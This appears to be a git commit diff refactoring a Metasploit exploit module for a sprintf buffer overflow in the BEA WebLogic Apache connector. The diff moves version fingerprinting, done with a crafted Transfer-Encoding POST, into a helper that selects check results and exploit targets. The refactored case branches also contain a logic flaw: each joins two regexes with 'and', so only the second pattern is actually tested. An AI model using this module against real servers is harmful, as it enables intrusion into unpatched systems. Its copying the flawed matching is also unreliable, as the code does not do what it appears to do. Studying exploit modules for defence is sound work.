trying to improve bea weblogic connector bof
This commit is contained in:
parent
c0d17734ed
commit
e7f5bf132c
|
@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Weblogic Apache plugin.
|
||||
|
||||
The connector fails to properly handle specially crafted HTTP POST
|
||||
requests, resulting a buffer overflow due to the insecure usage
|
||||
of sprintf. Currently, this module works over Windows systems without DEP,
|
||||
and has been tested with Windows 2000 / XP.
|
||||
requests resulting in a buffer overflow due to the insecure usage
|
||||
of sprintf.
|
||||
|
||||
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
|
||||
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||
request containing a specially crafted Transfer-Encoding header.
|
||||
|
||||
At this moment this module works over Windows systems without DEP
|
||||
and has been tested with Windows 2000 / XP.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -84,50 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
||||
res.body =~ /Change Number:<\/B> <I>616810/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
||||
res.body =~ /Change Number:<\/B> <I>452998/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# Check for dates prior to patch release
|
||||
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||
build_date = Date.parse($1)
|
||||
if build_date <= Date.parse("Jul 28 2008")
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
fingerprint = fingerprint_mod_wl
|
||||
|
||||
case fingerprint
|
||||
when /Version found/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
when /BEA WebLogic connector vulnerable/
|
||||
return Exploit::CheckCode::Appears
|
||||
when /BEA WebLogic connector undefined/
|
||||
return Exploit::CheckCode::Detected
|
||||
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
fingerprint = fingerprint_mod_wl
|
||||
|
||||
case fingerprint
|
||||
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
|
||||
return targets[1]
|
||||
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
|
||||
return targets[2]
|
||||
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
|
||||
return targets[3]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def fingerprint_mod_wl
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
return targets[1]
|
||||
case res.body
|
||||
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
|
||||
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
|
||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
||||
res.body =~ /Change Number:<\/B> <I>616810/
|
||||
return targets[2]
|
||||
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
||||
res.body =~ /Change Number:<\/B> <I>452998/
|
||||
return targets[3]
|
||||
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
|
||||
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
|
||||
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
|
||||
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
|
||||
# Check for dates prior to patch release
|
||||
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||
build_date = Date.parse($1)
|
||||
if build_date <= Date.parse("Jul 28 2008")
|
||||
return "BEA WebLogic connector vulnerable"
|
||||
else
|
||||
return "BEA WebLogic connector no vulnerable"
|
||||
end
|
||||
else
|
||||
return "BEA WebLogic connector undefined"
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
return "BEA WebLogic connector not found"
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue